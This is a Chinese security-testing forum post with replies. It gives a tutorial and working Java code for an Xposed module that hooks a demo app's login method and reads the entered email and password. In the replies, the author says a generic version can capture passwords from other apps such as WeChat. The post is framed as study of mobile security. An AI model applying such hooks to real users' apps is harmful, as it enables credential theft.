移动安全测试 Android 安全专项-Xposed 劫持用户名密码实践

易寒 · 2016年03月04日 · 最后由 fengyan 回复于 2016年03月15日 · 5716 次阅读
本帖已被设为精华帖!

Xposed 是个强大的工具,可以 hook 所有的 java 方法,下面用 Xposed 来截获 App 的用户名密码,默认你已经安装好 Xposed 环境了
参考文章:http://blog.csdn.net/beyond296089727/article/details/45766297

AS 中创建带有 Login 界面的项目

这里写图片描述

然后一路Next,创建成功后,运行,App界面如下:

这里写图片描述

为了使用Xposed劫持应用的用户名和密码,我们需要知道该应用的包名和要hook的方法,我们只要找到点击SIGN IN OR REGISTER按钮的点击事件处理方法,只要 hook 这个方法,我们就能获取到输入框中的信息。

  • 包名:xposed.doctorq.com.qq4xposed
  • hook 的方法:xposed.doctorq.com.qq4xposed.LoginActivity.attemptLogin

hookbeforeHookedMethod方法中获取下面两个属性的值:

这里写图片描述

Xposed Module

Xposed Module称为 Xposed 插件,利用 Xposed 进行实际劫持的项目。

我们创建一个不带界面的 Android 项目,创建一个类,实现IXposedHookLoadPackage:

public class LoginHook implements IXposedHookLoadPackage{

    @Override
    public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) throws Throwable {

        if(!loadPackageParam.packageName.equals("xposed.doctorq.com.qq4xposed")) return;


        findAndHookMethod("xposed.doctorq.com.qq4xposed.LoginActivity", loadPackageParam.classLoader, "attemptLogin", new XC_MethodHook() {
            @Override
            protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                XposedBridge.log("已经HOOK");
                Class o = param.thisObject.getClass();

                XposedBridge.log(o.getName());
                Field.setAccessible(o.getDeclaredFields(), true);

                Field fieldEmail = findField(o, "mEmailView");
                Field fieldPassword = findField(o,"mPasswordView");
                AutoCompleteTextView autoTextView = (AutoCompleteTextView)fieldEmail.get(param.thisObject);
                EditText editText = (EditText)fieldPassword.get(param.thisObject);
                String email = autoTextView.getText().toString();
                String password = editText.getText().toString();
                Toast.makeText((Activity)param.thisObject,"邮箱: " + email + ",密码 : " + password,Toast.LENGTH_LONG).show();
            }

            @Override
            protected void afterHookedMethod(MethodHookParam param) throws Throwable {

            }
        });

    }
}

xposed_init文件修改如下:

这里写图片描述

安装该应用,在Xposed Installer中勾选,重启生效,操作之前的App,正常输入邮箱和密码:

这里写图片描述

总结

使用 Xposed 进行 hook 的时候,难点不是如何使用 Xposed,而是如何找到要被 hook 的方法,比如你如何 hook QQ 登录方法,这就需要反编译 QQ 的 Apk 找到登录入口,要是学会这一点,随便一个 App 你都能 Hook。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!
共收到 25 条回复 时间 点赞

这个赞!这两天在搞 as,有时间实践下!

#1 楼 @neyo 你震惊了我,我以为你正在在搞 Xposed。

高端.
所以自己手机万不可 root...
业内已经有人用 xposed 搞微信红包了,提前看其他人领了多少.. 用到赌博的黑产里了。听说都赚了 1000w 了..

#2 楼 @doctorq 没。。周末在外面,拿流量听了教授的课,在 as 上搞 leak canary..

#6 楼 @neyo 教授是谁

现在怎么多重金招 android root 挖掘权限的。说到底无非是 root 可以拿用户数据,用户数据就是钱!

#7 楼 @doctorq 你啊。。q 博士。。叫错了

#8 楼 @zhangzhao_lenovo 所以 root 就是危险,也需要在测试方向上提出一些反击措施啊。这也是我要研究的方向

易寒 #15 · 2016年03月04日 Author

#9 楼 @neyo 我已泪奔,一下子变成了叫兽

#11 楼 @doctorq 博士不好意思啦😂

恭喜 Get 一个新技能 接下来就是要快速的定位要 hook 什么. 靠反编译是最慢的. 而且现在的反编译很多坑.
你接下来得学习下自动 hook 已经加载的所有类. 然后追踪每个动作的 api 执行流程. 这样可以快速的帮你定位要 hook 的类和方法

易寒 #14 · 2016年03月04日 Author

#13 楼 @seveniruby 这个思维好

@doctorq 请问这个需要先反编译拿到源码吧?看不到 mPasswordView 的话,还可以操作么?

这个原理工作中用的蛮多,实用性大,文章如果能对读者普及下实现原理更好

易寒 #19 · 2016年03月04日 Author

@quqing 实现原理,太多文章介绍了,我就不重复了。http://blog.csdn.net/wxyyxc1992/article/details/17320911

#7 楼 @doctorq 叫兽 哇咔咔咔

#14 楼 @doctorq 说的像是动态调试? http://www.kanxue.com/bbs/showthread.php?t=195202
另外 基于 xposed 的 zjdroid 也有类似功能了 http://bbs.pediy.com/showthread.php?p=1303746

好强大啊。。。。root 手机有风险,安装软件需谨慎啊

q 博士,那你是怎么逆向找到微信中要 hook 的方法呢?

易寒 #24 · 2016年03月15日 Author

#23 楼 @echo77 没逆向,是做了个通用的,hook 主公共方法。这样的好处我可以获取其他应用的密码,不止微信

#24 楼 @doctorq 是不是像安天里面说的那样做一下 hook 判断?HOOK–android.widget.TextView->setInputType,HOOK–android.app.Activity->onPause

需要 登录 后方可回复, 如果你还没有账号请点击这里 注册